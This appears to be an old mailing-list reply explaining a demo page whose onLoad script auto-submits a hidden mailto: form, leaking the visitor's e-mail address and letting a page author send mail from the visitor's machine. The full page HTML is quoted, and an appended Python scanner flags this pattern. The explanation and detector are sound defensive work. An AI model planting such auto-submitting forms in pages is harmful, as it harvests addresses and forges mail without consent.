Re: JavaScript to grab e-mail <explained>



I just had a look at the e-mail scamming script (URL
http://www.popco.com/grabtest.htm).  It's quite simple.  Here's the
complete text:

<HTML>
<HEAD>
</HEAD>
<BODY onLoad="document.mailme.submit()">

<form method=post name="mailme"
      action="mailto:reply@simenon.popco.com?subject=scammed address">

<h3>Viewing this page automatically submits email to an 
address which then sends you back email to prove it grabbed the message.</h3>

<input type=hidden name="scammed.the.address" value="did it">
</form>

</BODY>
</HTML>

Basically what the script does is to make the browser submit e-mail to
the indicated mailto: URL.  When the mail is sent, the user's reply
address is included as a matter of course.

The good news is that this does _not_ represent a general security
hole in JavaScript itself.  I was concerned that someone had
discovered a way to make JavaScript divulge such browser secrets as
the contents of the disk cache, history list, or newsgroup
subscriptions.  

The bad news is that this technique can be used as a general Internet
e-mail forgery system.  Anybody accessing a particular page will
unwittingly mail out an e-mail message, whose recipient, subject and
message body are all under the control of the JavaScript author.  If
the message is traced back, it will be found to have originated from
the user's machine.

Lincoln
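
An added example, not part of the message above: a static check in Python that flags the pattern the message describes, a form whose action is a mailto: URL and which page script submits without user action. The names `MailtoFormScanner` and `scan` and the sample page (with a placeholder address) are constructed for illustration, and the submit() match is a heuristic on script text, not a JavaScript parser.

```python
import re
from html.parser import HTMLParser

# Constructed sample modelled on the quoted page; the address is a placeholder.
SAMPLE = """<BODY onLoad="document.mailme.submit()">
<form method=post name="mailme" action="mailto:reply@example.invalid?subject=x">
<input type=hidden name="marker" value="did it"></form>
<form name="search" action="/find"><input name="q"></form></BODY>"""

class MailtoFormScanner(HTMLParser):
    """Collect forms plus all script text (inline on* handlers and <script> bodies)."""
    def __init__(self):
        super().__init__()
        self.forms, self.script_text = [], []
        self._form, self._in_script = None, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        self.script_text += [v for k, v in a.items() if k.startswith("on")]
        if tag == "script":
            self._in_script = True
        elif tag == "form":
            self._form = {"name": a.get("name", ""), "hidden": [],
                          "action": a.get("action", "").strip()}
            self.forms.append(self._form)
        elif tag == "input" and self._form and a.get("type", "").lower() == "hidden":
            self._form["hidden"].append(a.get("name", ""))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "form":
            self._form = None

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)

def scan(html):
    """Return each mailto: form, marked with whether page script calls submit() on it."""
    p = MailtoFormScanner()
    p.feed(html)
    code, findings = "\n".join(p.script_text), []
    for f in (f for f in p.forms if f["action"].lower().startswith("mailto:")):
        # Heuristic: a reference by form name or by document.forms[...] index
        refs = [r"forms\s*\[[^\]]*\]"] + ([r"\b%s\b" % re.escape(f["name"])] if f["name"] else [])
        pat = r"(?:%s)\s*\.\s*submit\s*\(" % "|".join(refs)
        findings.append(dict(f, auto_submit=bool(re.search(pat, code))))
    return findings
```

A finding with `auto_submit` set is the case described in the message; a mailto: form without it still sends mail from the visitor's account, but only when the visitor submits it.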

